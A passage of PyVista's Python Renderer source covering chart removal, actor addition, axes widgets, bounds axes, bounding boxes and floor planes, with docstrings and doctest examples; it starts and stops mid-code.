self._charts.get_charts_by_pos(pos) if self.has_charts else []\n\n def remove_chart(self, chart_or_index):\n \"\"\"Remove a chart from this renderer.\n\n Parameters\n ----------\n chart_or_index : Chart or int\n Either the chart to remove from this renderer or its index in the collection of charts.\n\n Examples\n --------\n First define a function to add two charts to a renderer.\n\n >>> import pyvista as pv\n >>> def plotter_with_charts():\n ... pl = pv.Plotter()\n ... pl.background_color = 'w'\n ... chart_left = pv.Chart2D(size=(0.5, 1))\n ... _ = chart_left.line([0, 1, 2], [2, 1, 3])\n ... pl.add_chart(chart_left)\n ... chart_right = pv.Chart2D(size=(0.5, 1), loc=(0.5, 0))\n ... _ = chart_right.line([0, 1, 2], [3, 1, 2])\n ... pl.add_chart(chart_right)\n ... return pl, chart_left, chart_right\n ...\n >>> pl, *_ = plotter_with_charts()\n >>> pl.show()\n\n Now reconstruct the same plotter but remove the right chart by index.\n\n >>> pl, *_ = plotter_with_charts()\n >>> pl.remove_chart(1)\n >>> pl.show()\n\n Finally, remove the left chart by reference.\n\n >>> pl, chart_left, chart_right = plotter_with_charts()\n >>> pl.remove_chart(chart_left)\n >>> pl.show()\n\n \"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n if self.has_charts:\n self._charts.remove_chart(chart_or_index)\n\n @property\n def actors(self): # numpydoc ignore=RT01\n \"\"\"Return a dictionary of actors assigned to this renderer.\"\"\"\n return self._actors\n\n def add_actor(\n self,\n actor,\n reset_camera=False,\n name=None,\n culling=False,\n pickable=True,\n render=True,\n remove_existing_actor=True,\n ):\n \"\"\"Add an actor to render window.\n\n Creates an actor if input is a mapper.\n\n Parameters\n ----------\n actor : vtk.vtkActor | vtk.vtkMapper | pyvista.Actor\n The actor to be added. Can be either ``vtkActor`` or ``vtkMapper``.\n\n reset_camera : bool, default: False\n Resets the camera when ``True``.\n\n name : str, optional\n Name to assign to the actor. Defaults to the memory address.\n\n culling : str, default: False\n Does not render faces that are culled. Options are\n ``'front'`` or ``'back'``. This can be helpful for dense\n surface meshes, especially when edges are visible, but can\n cause flat meshes to be partially displayed.\n\n pickable : bool, default: True\n Whether to allow this actor to be pickable within the\n render window.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after adding the actor.\n\n remove_existing_actor : bool, default: True\n Removes any existing actor if the named actor ``name`` is already\n present.\n\n Returns\n -------\n actor : vtk.vtkActor or pyvista.Actor\n The actor.\n\n actor_properties : vtk.Properties\n Actor properties.\n \"\"\"\n # Remove actor by that name if present\n rv = None\n if name and remove_existing_actor:\n rv = self.remove_actor(name, reset_camera=False, render=False)\n\n if isinstance(actor, _vtk.vtkMapper):\n actor = Actor(mapper=actor, name=name)\n\n if isinstance(actor, Actor) and name:\n # WARNING: this will override the name if already set on Actor\n actor.name = name\n\n if name is None:\n if isinstance(actor, Actor):\n name = actor.name\n else:\n # Fallback for non-wrapped actors\n # e.g., vtkScalarBarActor\n name = actor.GetAddressAsString(\"\")\n\n actor.SetPickable(pickable)\n # Apply this renderer's scale to the actor (which can be further scaled)\n if hasattr(actor, 'SetScale'):\n actor.SetScale(np.array(actor.GetScale()) * np.array(self.scale))\n self.AddActor(actor) # must add actor before resetting camera\n self._actors[name] = actor\n\n if reset_camera:\n self.reset_camera(render)\n elif not self.camera_set and reset_camera is None and not rv:\n self.reset_camera(render)\n elif render:\n self.parent.render()\n\n self.update_bounds_axes()\n\n if isinstance(culling, str):\n culling = culling.lower()\n\n if culling:\n if culling in [True, 'back', 'backface', 'b']:\n try:\n actor.GetProperty().BackfaceCullingOn()\n except AttributeError: # pragma: no cover\n pass\n elif culling in ['front', 'frontface', 'f']:\n try:\n actor.GetProperty().FrontfaceCullingOn()\n except AttributeError: # pragma: no cover\n pass\n else:\n raise ValueError(f'Culling option ({culling}) not understood.')\n\n self.Modified()\n\n prop = None\n if hasattr(actor, 'GetProperty'):\n prop = actor.GetProperty()\n\n return actor, prop\n\n def add_axes_at_origin(\n self,\n x_color=None,\n y_color=None,\n z_color=None,\n xlabel='X',\n ylabel='Y',\n zlabel='Z',\n line_width=2,\n labels_off=False,\n ):\n \"\"\"Add axes actor at origin.\n\n Parameters\n ----------\n x_color : ColorLike, optional\n The color of the x axes arrow.\n\n y_color : ColorLike, optional\n The color of the y axes arrow.\n\n z_color : ColorLike, optional\n The color of the z axes arrow.\n\n xlabel : str, default: \"X\"\n The label of the x axes arrow.\n\n ylabel : str, default: \"Y\"\n The label of the y axes arrow.\n\n zlabel : str, default: \"Z\"\n The label of the z axes arrow.\n\n line_width : int, default: 2\n Width of the arrows.\n\n labels_off : bool, default: False\n Disables the label text when ``True``.\n\n Returns\n -------\n vtk.vtkAxesActor\n Actor of the axes.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere(center=(2, 0, 0)), color='r')\n >>> _ = pl.add_mesh(pv.Sphere(center=(0, 2, 0)), color='g')\n >>> _ = pl.add_mesh(pv.Sphere(center=(0, 0, 2)), color='b')\n >>> _ = pl.add_axes_at_origin()\n >>> pl.show()\n\n \"\"\"\n self._marker_actor = create_axes_marker(\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n ylabel=ylabel,\n zlabel=zlabel,\n labels_off=labels_off,\n )\n self.AddActor(self._marker_actor)\n memory_address = self._marker_actor.GetAddressAsString(\"\")\n self._actors[memory_address] = self._marker_actor\n self.Modified()\n return self._marker_actor\n\n def add_orientation_widget(\n self, actor, interactive=None, color=None, opacity=1.0, viewport=None\n ):\n \"\"\"Use the given actor in an orientation marker widget.\n\n Color and opacity are only valid arguments if a mesh is passed.\n\n Parameters\n ----------\n actor : vtk.vtkActor | pyvista.DataSet\n The mesh or actor to use as the marker.\n\n interactive : bool, optional\n Control if the orientation widget is interactive. By\n default uses the value from\n :attr:`pyvista.global_theme.interactive\n `.\n\n color : ColorLike, optional\n The color of the actor. This only applies if ``actor`` is\n a :class:`pyvista.DataSet`.\n\n opacity : int | float, default: 1.0\n Opacity of the marker.\n\n viewport : sequence[float], optional\n Viewport ``(xstart, ystart, xend, yend)`` of the widget.\n\n Returns\n -------\n vtk.vtkOrientationMarkerWidget\n Orientation marker widget.\n\n Examples\n --------\n Use an Arrow as the orientation widget.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Cube(), show_edges=True)\n >>> actor = pl.add_orientation_widget(pv.Arrow(), color='r')\n >>> pl.show()\n\n \"\"\"\n if isinstance(actor, pyvista.DataSet):\n mapper = _vtk.vtkDataSetMapper()\n mesh = actor.copy()\n mesh.clear_data()\n mapper.SetInputData(mesh)\n actor = pyvista.Actor(mapper=mapper)\n if color is not None:\n actor.prop.color = color\n actor.prop.opacity = opacity\n if hasattr(self, 'axes_widget'):\n # Delete the old one\n self.axes_widget.EnabledOff()\n self.Modified()\n del self.axes_widget\n if interactive is None:\n interactive = self._theme.interactive\n self.axes_widget = _vtk.vtkOrientationMarkerWidget()\n self.axes_widget.SetOrientationMarker(actor)\n if hasattr(self.parent, 'iren'):\n self.axes_widget.SetInteractor(self.parent.iren.interactor)\n self.axes_widget.SetEnabled(1)\n self.axes_widget.SetInteractive(interactive)\n self.axes_widget.SetCurrentRenderer(self)\n if viewport is not None:\n self.axes_widget.SetViewport(viewport)\n self.Modified()\n return self.axes_widget\n\n def add_axes(\n self,\n interactive=None,\n line_width=2,\n color=None,\n x_color=None,\n y_color=None,\n z_color=None,\n xlabel='X',\n ylabel='Y',\n zlabel='Z',\n labels_off=False,\n box=None,\n box_args=None,\n viewport=(0, 0, 0.2, 0.2),\n **kwargs,\n ):\n \"\"\"Add an interactive axes widget in the bottom left corner.\n\n Parameters\n ----------\n interactive : bool, optional\n Enable this orientation widget to be moved by the user.\n\n line_width : int, default: 2\n The width of the marker lines.\n\n color : ColorLike, optional\n Color of the labels.\n\n x_color : ColorLike, optional\n Color used for the x axis arrow. Defaults to theme axes parameters.\n\n y_color : ColorLike, optional\n Color used for the y axis arrow. Defaults to theme axes parameters.\n\n z_color : ColorLike, optional\n Color used for the z axis arrow. Defaults to theme axes parameters.\n\n xlabel : str, default: \"X\"\n Text used for the x axis.\n\n ylabel : str, default: \"Y\"\n Text used for the y axis.\n\n zlabel : str, default: \"Z\"\n Text used for the z axis.\n\n labels_off : bool, default: false\n Enable or disable the text labels for the axes.\n\n box : bool, optional\n Show a box orientation marker. Use ``box_args`` to adjust.\n See :func:`pyvista.create_axes_orientation_box` for details.\n\n box_args : dict, optional\n Parameters for the orientation box widget when\n ``box=True``. See the parameters of\n :func:`pyvista.create_axes_orientation_box`.\n\n viewport : sequence[float], default: (0, 0, 0.2, 0.2)\n Viewport ``(xstart, ystart, xend, yend)`` of the widget.\n\n **kwargs : dict, optional\n Used for passing parameters for the orientation marker\n widget. See the parameters of :func:`pyvista.create_axes_marker`.\n\n Returns\n -------\n vtk.vtkAxesActor\n Axes actor.\n\n Examples\n --------\n Show axes without labels and with thick lines.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Box(), show_edges=True)\n >>> _ = pl.add_axes(line_width=5, labels_off=True)\n >>> pl.show()\n\n Use the axes orientation widget instead of the default arrows.\n\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> _ = pl.add_axes(box=True)\n >>> pl.show()\n\n Specify more parameters for the axes marker.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Box(), show_edges=True)\n >>> _ = pl.add_axes(\n ... line_width=5,\n ... cone_radius=0.6,\n ... shaft_length=0.7,\n ... tip_length=0.3,\n ... ambient=0.5,\n ... label_size=(0.4, 0.16),\n ... )\n >>> pl.show()\n\n \"\"\"\n if interactive is None:\n interactive = self._theme.interactive\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOff()\n self.Modified()\n del self.axes_widget\n if box is None:\n box = self._theme.axes.box\n if box:\n if box_args is None:\n box_args = {}\n self.axes_actor = create_axes_orientation_box(\n label_color=color,\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n ylabel=ylabel,\n zlabel=zlabel,\n labels_off=labels_off,\n **box_args,\n )\n else:\n self.axes_actor = create_axes_marker(\n label_color=color,\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n ylabel=ylabel,\n zlabel=zlabel,\n labels_off=labels_off,\n **kwargs,\n )\n axes_widget = self.add_orientation_widget(\n self.axes_actor, interactive=interactive, color=None\n )\n axes_widget.SetViewport(viewport)\n return self.axes_actor\n\n def hide_axes(self):\n \"\"\"Hide the axes orientation widget.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.hide_axes()\n\n \"\"\"\n if hasattr(self, 'axes_widget') and self.axes_widget.GetEnabled():\n self.axes_widget.EnabledOff()\n self.Modified()\n\n def show_axes(self):\n \"\"\"Show the axes orientation widget.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.show_axes()\n\n \"\"\"\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOn()\n self.axes_widget.SetCurrentRenderer(self)\n else:\n self.add_axes()\n self.Modified()\n\n @property\n def axes_enabled(self): # numpydoc ignore=RT01\n \"\"\"Return ``True`` when axes are enabled.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.hide_axes()\n >>> pl.renderer.axes_enabled\n False\n\n \"\"\"\n if hasattr(self, 'axes_widget'):\n return bool(self.axes_widget.GetEnabled())\n return False\n\n def show_bounds(\n self,\n mesh=None,\n bounds=None,\n axes_ranges=None,\n show_xaxis=True,\n show_yaxis=True,\n show_zaxis=True,\n show_xlabels=True,\n show_ylabels=True,\n show_zlabels=True,\n bold=True,\n font_size=None,\n font_family=None,\n color=None,\n xtitle='X Axis',\n ytitle='Y Axis',\n ztitle='Z Axis',\n n_xlabels=5,\n n_ylabels=5,\n n_zlabels=5,\n use_2d=False,\n grid=None,\n location='closest',\n ticks=None,\n all_edges=False,\n corner_factor=0.5,\n fmt=None,\n minor_ticks=False,\n padding=0.0,\n use_3d_text=True,\n render=None,\n **kwargs,\n ):\n \"\"\"Add bounds axes.\n\n Shows the bounds of the most recent input mesh unless mesh is\n specified.\n\n Parameters\n ----------\n mesh : pyvista.DataSet | pyvista.MultiBlock, optional\n Input mesh to draw bounds axes around.\n\n bounds : sequence[float], optional\n Bounds to override mesh bounds in the form ``[xmin, xmax,\n ymin, ymax, zmin, zmax]``.\n\n axes_ranges : sequence[float], optional\n When set, these values override the values that are shown on the\n axes. This can be useful when plotting scaled datasets or if you wish\n to manually display different values. These values must be in the\n form:\n\n ``[xmin, xmax, ymin, ymax, zmin, zmax]``.\n\n show_xaxis : bool, default: True\n Makes X axis visible.\n\n show_yaxis : bool, default: True\n Makes Y axis visible.\n\n show_zaxis : bool, default: True\n Makes Z axis visible.\n\n show_xlabels : bool, default: True\n Shows X labels.\n\n show_ylabels : bool, default: True\n Shows Y labels.\n\n show_zlabels : bool, default: True\n Shows Z labels.\n\n bold : bool, default: True\n Bolds axis labels and numbers.\n\n font_size : float, optional\n Sets the size of the label font. Defaults to\n :attr:`pyvista.global_theme.font.size\n `.\n\n font_family : str, optional\n Font family. Must be either ``'courier'``, ``'times'``,\n or ``'arial'``. Defaults to :attr:`pyvista.global_theme.font.family\n `.\n\n color : ColorLike, optional\n Color of all labels and axis titles. Defaults to\n :attr:`pyvista.global_theme.font.color\n `.\n\n Either a string, RGB list, or hex color string. For\n example:\n\n * ``color='white'``\n * ``color='w'``\n * ``color=[1.0, 1.0, 1.0]``\n * ``color='#FFFFFF'``\n\n xtitle : str, default: \"X Axis\"\n Title of the X axis. Default ``\"X Axis\"``.\n\n ytitle : str, default: \"Y Axis\"\n Title of the Y axis. Default ``\"Y Axis\"``.\n\n ztitle : str, default: \"Z Axis\"\n Title of the Z axis. Default ``\"Z Axis\"``.\n\n n_xlabels : int, default: 5\n Number of labels for the X axis.\n\n n_ylabels : int, default: 5\n Number of labels for the Y axis.\n\n n_zlabels : int, default: 5\n Number of labels for the Z axis.\n\n use_2d : bool, default: False\n This can be enabled for smoother plotting.\n\n grid : bool or str, optional\n Add grid lines to the backface (``True``, ``'back'``, or\n ``'backface'``) or to the frontface (``'front'``,\n ``'frontface'``) of the axes actor.\n\n location : str, default: \"closest\"\n Set how the axes are drawn: either static (``'all'``), closest\n triad (``'front'``, ``'closest'``, ``'default'``), furthest triad\n (``'back'``, ``'furthest'``), static closest to the origin\n (``'origin'``), or outer edges (``'outer'``) in relation to the\n camera position.\n\n ticks : str, optional\n Set how the ticks are drawn on the axes grid. Options include:\n ``'inside', 'outside', 'both'``.\n\n all_edges : bool, default: False\n Adds an unlabeled and unticked box at the boundaries of\n plot. Useful for when wanting to plot outer grids while\n still retaining all edges of the boundary.\n\n corner_factor : float, default: 0.5\n If ``all_edges``, this is the factor along each axis to\n draw the default box. Default shows the full box.\n\n fmt : str, optional\n A format string defining how tick labels are generated from\n tick positions. A default is looked up on the active theme.\n\n minor_ticks : bool, default: False\n If ``True``, also plot minor ticks on all axes.\n\n padding : float, default: 0.0\n An optional percent padding along each axial direction to\n cushion the datasets in the scene from the axes\n annotations. Defaults no padding.\n\n use_3d_text : bool, default: True\n Use ``vtkTextActor3D`` for titles and labels.\n\n render : bool, optional\n If the render window is being shown, trigger a render\n after showing bounds.\n\n **kwargs : dict, optional\n Deprecated keyword arguments.\n\n Returns\n -------\n vtk.vtkCubeAxesActor\n Bounds actor.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> from pyvista import examples\n\n >>> mesh = pv.Sphere()\n >>> plotter = pv.Plotter()\n >>> actor = plotter.add_mesh(mesh)\n >>> actor = plotter.show_bounds(\n ... grid='front',\n ... location='outer',\n ... all_edges=True,\n ... )\n >>> plotter.show()\n\n Control how many labels are displayed.\n\n >>> mesh = examples.load_random_hills()\n\n >>> plotter = pv.Plotter()\n >>> actor = plotter.add_mesh(\n ... mesh, cmap='terrain', show_scalar_bar=False\n ... )\n >>> actor = plotter.show_bounds(\n ... grid='back',\n ... location='outer',\n ... ticks='both',\n ... n_xlabels=2,\n ... n_ylabels=2,\n ... n_zlabels=2,\n ... xtitle='Easting',\n ... ytitle='Northing',\n ... ztitle='Elevation',\n ... )\n >>> plotter.show()\n\n Hide labels, but still show axis titles.\n\n >>> plotter = pv.Plotter()\n >>> actor = plotter.add_mesh(\n ... mesh, cmap='terrain', show_scalar_bar=False\n ... )\n >>> actor = plotter.show_bounds(\n ... grid='back',\n ... location='outer',\n ... ticks='both',\n ... show_xlabels=False,\n ... show_ylabels=False,\n ... show_zlabels=False,\n ... xtitle='Easting',\n ... ytitle='Northing',\n ... ztitle='Elevation',\n ... )\n >>> plotter.show()\n\n \"\"\"\n self.remove_bounds_axes()\n\n if font_family is None:\n font_family = self._theme.font.family\n if font_size is None:\n font_size = self._theme.font.size\n if fmt is None:\n fmt = self._theme.font.fmt\n if fmt is None:\n fmt = '%.1f' # fallback\n\n if 'xlabel' in kwargs: # pragma: no cover\n xtitle = kwargs.pop('xlabel')\n warnings.warn(\n \"`xlabel` is deprecated. Use `xtitle` instead.\",\n PyVistaDeprecationWarning,\n )\n if 'ylabel' in kwargs: # pragma: no cover\n ytitle = kwargs.pop('ylabel')\n warnings.warn(\n \"`ylabel` is deprecated. Use `ytitle` instead.\",\n PyVistaDeprecationWarning,\n )\n if 'zlabel' in kwargs: # pragma: no cover\n ztitle = kwargs.pop('zlabel')\n warnings.warn(\n \"`zlabel` is deprecated. Use `ztitle` instead.\",\n PyVistaDeprecationWarning,\n )\n assert_empty_kwargs(**kwargs)\n\n color = Color(color, default_color=self._theme.font.color)\n\n if mesh is None and bounds is None:\n # Use the bounds of all data in the rendering window\n bounds = np.array(self.bounds)\n elif bounds is None:\n # otherwise, use the bounds of the mesh (if available)\n bounds = np.array(mesh.bounds)\n else:\n bounds = np.asanyarray(bounds, dtype=float)\n\n # create actor\n cube_axes_actor = pyvista.CubeAxesActor(\n self.camera,\n minor_ticks=minor_ticks,\n tick_location=ticks,\n x_title=xtitle,\n y_title=ytitle,\n z_title=ztitle,\n x_axis_visibility=show_xaxis,\n y_axis_visibility=show_yaxis,\n z_axis_visibility=show_zaxis,\n x_label_format=fmt,\n y_label_format=fmt,\n z_label_format=fmt,\n x_label_visibility=show_xlabels,\n y_label_visibility=show_ylabels,\n z_label_visibility=show_zlabels,\n n_xlabels=n_xlabels,\n n_ylabels=n_ylabels,\n n_zlabels=n_zlabels,\n )\n\n cube_axes_actor.use_2d_mode = use_2d or not np.allclose(self.scale, [1.0, 1.0, 1.0])\n\n if grid:\n grid = 'back' if grid is True else grid\n if not isinstance(grid, str):\n raise TypeError(f'`grid` must be a str, not {type(grid)}')\n grid = grid.lower()\n if grid in ('front', 'frontface'):\n cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_CLOSEST)\n elif grid in ('both', 'all'):\n cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_ALL)\n elif grid in ('back', True):\n cube_axes_actor.SetGridLineLocation(cube_axes_actor.VTK_GRID_LINES_FURTHEST)\n else:\n raise ValueError(f'`grid` must be either \"front\", \"back, or, \"all\", not {grid}')\n # Only show user desired grid lines\n cube_axes_actor.SetDrawXGridlines(show_xaxis)\n cube_axes_actor.SetDrawYGridlines(show_yaxis)\n cube_axes_actor.SetDrawZGridlines(show_zaxis)\n # Set the colors\n cube_axes_actor.GetXAxesGridlinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetYAxesGridlinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetZAxesGridlinesProperty().SetColor(color.float_rgb)\n\n if isinstance(location, str):\n location = location.lower()\n if location in ('all'):\n cube_axes_actor.SetFlyModeToStaticEdges()\n elif location in ('origin'):\n cube_axes_actor.SetFlyModeToStaticTriad()\n elif location in ('outer'):\n cube_axes_actor.SetFlyModeToOuterEdges()\n elif location in ('default', 'closest', 'front'):\n cube_axes_actor.SetFlyModeToClosestTriad()\n elif location in ('furthest', 'back'):\n cube_axes_actor.SetFlyModeToFurthestTriad()\n else:\n raise ValueError(\n f'Value of location (\"{location}\") should be either \"all\", \"origin\",'\n ' \"outer\", \"default\", \"closest\", \"front\", \"furthest\", or \"back\".'\n )\n elif location is not None:\n raise TypeError('location must be a string')\n\n if isinstance(padding, (int, float)) and 0.0 <= padding < 1.0:\n if not np.any(np.abs(bounds) == np.inf):\n cushion = (\n np.array(\n [\n np.abs(bounds[1] - bounds[0]),\n np.abs(bounds[3] - bounds[2]),\n np.abs(bounds[5] - bounds[4]),\n ]\n )\n * padding\n )\n bounds[::2] -= cushion\n bounds[1::2] += cushion\n else:\n raise ValueError(f'padding ({padding}) not understood. Must be float between 0 and 1')\n cube_axes_actor.bounds = bounds\n\n # set axes ranges if input\n if axes_ranges is not None:\n if isinstance(axes_ranges, (collections.abc.Sequence, np.ndarray)):\n axes_ranges = np.asanyarray(axes_ranges)\n else:\n raise TypeError('Input axes_ranges must be a numeric sequence.')\n\n if not np.issubdtype(axes_ranges.dtype, np.number):\n raise TypeError('All of the elements of axes_ranges must be numbers.')\n\n # set the axes ranges\n if axes_ranges.shape != (6,):\n raise ValueError(\n '`axes_ranges` must be passed as a [xmin, xmax, ymin, ymax, zmin, zmax] sequence.'\n )\n\n cube_axes_actor.x_axis_range = axes_ranges[0], axes_ranges[1]\n cube_axes_actor.y_axis_range = axes_ranges[2], axes_ranges[3]\n cube_axes_actor.z_axis_range = axes_ranges[4], axes_ranges[5]\n\n # set color\n cube_axes_actor.GetXAxesLinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetYAxesLinesProperty().SetColor(color.float_rgb)\n cube_axes_actor.GetZAxesLinesProperty().SetColor(color.float_rgb)\n\n # set font\n font_family = parse_font_family(font_family)\n\n if not use_3d_text or not np.allclose(self.scale, [1.0, 1.0, 1.0]):\n use_3d_text = False\n cube_axes_actor.SetUseTextActor3D(False)\n else:\n cube_axes_actor.SetUseTextActor3D(True)\n\n props = [\n cube_axes_actor.GetTitleTextProperty(0),\n cube_axes_actor.GetTitleTextProperty(1),\n cube_axes_actor.GetTitleTextProperty(2),\n cube_axes_actor.GetLabelTextProperty(0),\n cube_axes_actor.GetLabelTextProperty(1),\n cube_axes_actor.GetLabelTextProperty(2),\n ]\n\n for prop in props:\n prop.SetColor(color.float_rgb)\n prop.SetFontFamily(font_family)\n prop.SetBold(bold)\n\n # this merely makes the font sharper\n if use_3d_text:\n prop.SetFontSize(50)\n\n # Note: font_size does nothing as a property, use SetScreenSize instead\n # Here, we normalize relative to 12 to give the user an illusion of\n # just changing the font size relative to a font size of 12. 10 is used\n # here since it's the default \"screen size\".\n cube_axes_actor.SetScreenSize(font_size / 12 * 10.0)\n\n self.add_actor(cube_axes_actor, reset_camera=False, pickable=False, render=render)\n self.cube_axes_actor = cube_axes_actor\n\n if all_edges:\n self.add_bounding_box(color=color, corner_factor=corner_factor)\n\n self.Modified()\n return cube_axes_actor\n\n def show_grid(self, **kwargs):\n \"\"\"Show grid lines and bounds axes labels.\n\n A wrapped implementation of :func:`show_bounds()\n ` to change default behavior to use\n grid lines and showing the axes labels on the outer edges.\n\n This is intended to be similar to :func:`matplotlib.pyplot.grid`.\n\n Parameters\n ----------\n **kwargs : dict, optional\n See :func:`Renderer.show_bounds` for additional keyword\n arguments.\n\n Returns\n -------\n vtk.vtkAxesActor\n Bounds actor.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> mesh = pv.Cone()\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(mesh)\n >>> _ = pl.show_grid()\n >>> pl.show()\n\n \"\"\"\n kwargs.setdefault('grid', 'back')\n kwargs.setdefault('location', 'outer')\n kwargs.setdefault('ticks', 'both')\n return self.show_bounds(**kwargs)\n\n def remove_bounding_box(self, render=True):\n \"\"\"Remove bounding box.\n\n Parameters\n ----------\n render : bool, default: True\n Trigger a render once the bounding box is removed.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_bounding_box()\n >>> pl.remove_bounding_box()\n\n \"\"\"\n if hasattr(self, '_box_object'):\n actor = self.bounding_box_actor\n self.bounding_box_actor = None\n del self._box_object\n self.remove_actor(actor, reset_camera=False, render=render)\n self.Modified()\n\n def add_bounding_box(\n self,\n color=\"grey\",\n corner_factor=0.5,\n line_width=None,\n opacity=1.0,\n render_lines_as_tubes=False,\n lighting=None,\n reset_camera=None,\n outline=True,\n culling='front',\n ):\n \"\"\"Add an unlabeled and unticked box at the boundaries of plot.\n\n Useful for when wanting to plot outer grids while still\n retaining all edges of the boundary.\n\n Parameters\n ----------\n color : ColorLike, default: \"grey\"\n Color of all labels and axis titles. Default white.\n Either a string, rgb sequence, or hex color string. For\n example:\n\n * ``color='white'``\n * ``color='w'``\n * ``color=[1.0, 1.0, 1.0]``\n * ``color='#FFFFFF'``\n\n corner_factor : float, default: 0.5\n This is the factor along each axis to draw the default\n box. Default is 0.5 to show the full box.\n\n line_width : float, optional\n Thickness of lines.\n\n opacity : float, default: 1.0\n Opacity of mesh. Should be between 0 and 1.\n\n render_lines_as_tubes : bool, default: False\n Show lines as thick tubes rather than flat lines. Control\n the width with ``line_width``.\n\n lighting : bool, optional\n Enable or disable directional lighting for this actor.\n\n reset_camera : bool, optional\n Reset camera position when ``True`` to include all actors.\n\n outline : bool, default: True\n Default is ``True``. when ``False``, a box with faces is\n shown with the specified culling.\n\n culling : str, default: \"front\"\n Does not render faces on the bounding box that are culled. Options\n are ``'front'`` or ``'back'``.\n\n Returns\n -------\n vtk.vtkActor\n VTK actor of the bounding box.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere())\n >>> _ = pl.add_bounding_box(line_width=5, color='black')\n >>> pl.show()\n\n \"\"\"\n if lighting is None:\n lighting = self._theme.lighting\n\n self.remove_bounding_box()\n if outline:\n self._bounding_box = _vtk.vtkOutlineCornerSource()\n self._bounding_box.SetCornerFactor(corner_factor)\n else:\n self._bounding_box = _vtk.vtkCubeSource()\n self._bounding_box.SetBounds(self.bounds)\n self._bounding_box.Update()\n self._box_object = wrap(self._bounding_box.GetOutput())\n name = f'BoundingBox({hex(id(self._box_object))})'\n\n mapper = _vtk.vtkDataSetMapper()\n mapper.SetInputData(self._box_object)\n self.bounding_box_actor, prop = self.add_actor(\n mapper, reset_camera=reset_camera, name=name, culling=culling, pickable=False\n )\n\n prop.SetColor(Color(color, default_color=self._theme.outline_color).float_rgb)\n prop.SetOpacity(opacity)\n if render_lines_as_tubes:\n prop.SetRenderLinesAsTubes(render_lines_as_tubes)\n\n # lighting display style\n if lighting is False:\n prop.LightingOff()\n\n # set line thickness\n if line_width:\n prop.SetLineWidth(line_width)\n\n prop.SetRepresentationToSurface()\n self.Modified()\n return self.bounding_box_actor\n\n def add_floor(\n self,\n face='-z',\n i_resolution=10,\n j_resolution=10,\n color=None,\n line_width=None,\n opacity=1.0,\n show_edges=False,\n lighting=False,\n edge_color=None,\n reset_camera=None,\n pad=0.0,\n offset=0.0,\n pickable=False,\n store_floor_kwargs=True,\n ):\n \"\"\"Show a floor mesh.\n\n This generates planes at the boundaries of the scene to behave\n like floors or walls.\n\n Parameters\n ----------\n face : str, default: \"-z\"\n The face at which to place the plane. Options are\n (``'-z'``, ``'-y'``, ``'-x'``, ``'+z'``, ``'+y'``, and\n ``'+z'``). Where the ``-/+`` sign indicates on which side of\n the axis the plane will lie. For example, ``'-z'`` would\n generate a floor on the XY-plane and the bottom of the\n scene (minimum z).\n\n i_resolution : int, default: 10\n Number of points on the plane in the i direction.\n\n j_resolution : int, default: 10\n Number of points on the plane in the j direction.\n\n color : ColorLike, optional\n Color of all labels and axis titles. Default gray.\n Either a string, rgb list, or hex color string.\n\n line_width : int, optional\n Thickness of the edges. Only if ``show_edges`` is\n ``True``.\n\n opacity : float, default: 1.0\n The opacity of the generated surface.\n\n show_edges : bool, default: False\n Flag on whether to show the mesh edges for tiling.\n\n line_width : float, default: False\n Thickness of lines. Only valid for wireframe and surface\n representations.\n\n lighting : bool, default: False\n Enable or disable view direction lighting.\n\n edge_color : ColorLike, optional\n Color of the edges of the mesh.\n\n reset_camera : bool, optional\n Resets the camera when ``True`` after adding the floor.\n\n pad : float, default: 0.0\n Percentage padding between 0 and 1.\n\n offset : float, default: 0.0\n Percentage offset along plane normal.\n\n pickable : bool, default: false\n Make this floor actor pickable in the renderer.\n\n store_floor_kwargs : bool, default: True\n Stores the keyword arguments used when adding this floor.\n Useful when updating the bounds and regenerating the\n floor.\n\n Returns\n -------\n vtk.vtkActor\n VTK actor of the floor.\n\n Examples\n --------\n Add a floor below a sphere and plot it.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> actor = pl.add_floor()\n >>> pl.show()\n\n \"\"\"\n if store_floor_kwargs:\n kwargs = locals()\n kwargs.pop('self')\n self._floor_kwargs.append(kwargs)\n ranges = np.array(self.bounds).reshape(-1, 2).ptp(axis=1)\n ranges += ranges * pad\n center = np.array(self.center)\n if face.lower() in '-z':\n center[2] = self.bounds[4] - (ranges[2] * offset)\n normal = (0, 0, 1)\n i_size = ranges[0]\n j_size = ranges[1]\n elif face.lower() in '-y':\n center[1] = self.bounds[2] - (ranges[1] * offset)\n normal = (0, 1, 0)\n i_size = ranges[0]\n j_size = ranges[2]\n elif face.lower() in '-x':\n center[0] = 